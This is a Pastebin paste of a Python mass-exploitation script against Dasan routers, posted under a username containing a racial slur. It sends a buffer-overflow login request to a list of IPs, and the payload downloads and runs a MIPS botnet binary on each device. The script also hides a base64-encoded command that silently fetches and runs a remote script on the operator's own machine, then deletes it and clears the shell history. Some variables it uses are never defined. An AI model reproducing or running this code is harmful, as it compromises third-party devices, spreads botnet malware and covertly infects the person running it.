API tools faq
paste
mirainigga

[PYTHON] Dasan Exploit

mirainigga
Jul 8th, 2018
529
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.54 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. #nexus zeta is big 0 day exploiter 10/10
  4. import sys, socket, json, time, ssl, struct, os, subprocess, base64
  5. from threading import Thread
  6. if len(sys.argv) < 2:
  7. print "Usage: python "+sys.argv[0]+" <list>"
  8. sys.exit()
  9. port = 8080
  10. buf = 4096
  11. pre_pl0 = 0x2ad0c000
  12. pre_pl2 = pre_pl0 + 0x00115d40
  13. pl2 = struct.pack(">i",pre_pl2)
  14. pre_pl3 = pre_pl0 + 0x0003CC9C
  15. pl3 = struct.pack(">i",pre_pl3)
  16.  
  17. payload = "wget http://0.0.0.0.0/bins/mips.iot -O /tmp/girl; chmod 777 /tmp/girl; /tmp/girl dasan"
  18. pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
  19. post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  20. headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  21. i = 0
  22. ips = open(sys.argv[1]).readlines()
  23.  
  24. def start_dasan(cmd):
  25. subprocess.call(cmd, shell=True)
  26. dasanpayload = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
  27. pload = str(base64.b64decode(dasanpayload))
  28. start_dasan(pload)
  29.  
  30. def dasan(host):
  31. global i
  32. host = host.strip("\n")
  33. try:
  34. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  35. s = ssl.wrap_socket(sock)
  36. s.connect((host, port))
  37. s.send(headers)
  38. s.send(headers2)
  39. s.send(headers3)
  40. resp = s.recv(buf).strip()
  41. if "200 OK" in resp:
  42. i += 1
  43. s.close()
  44. except:
  45. pass
  46.  
  47. def worker():
  48. for ip in ips:
  49. try:
  50. ip = ip.strip("\r\n")
  51. t = Thread(target=dasan, args=(ip,))
  52. t.start()
  53. time.sleep(0.01)
  54. except:
  55. pass
  56. time.sleep(30)
  57. sys.exit("Finished Scanning")
  58. workerthrd = Thread(target=worker)
  59. workerthrd.start()
  60. print headers
  61. while True:
  62. try:
  63. sent = i
  64. sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
  65. sys.stdout.flush()
  66. time.sleep(1)
  67. except KeyboardInterrupt:
  68. sys.exit("Exiting On User Input")
  69. except:
  70. pass
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!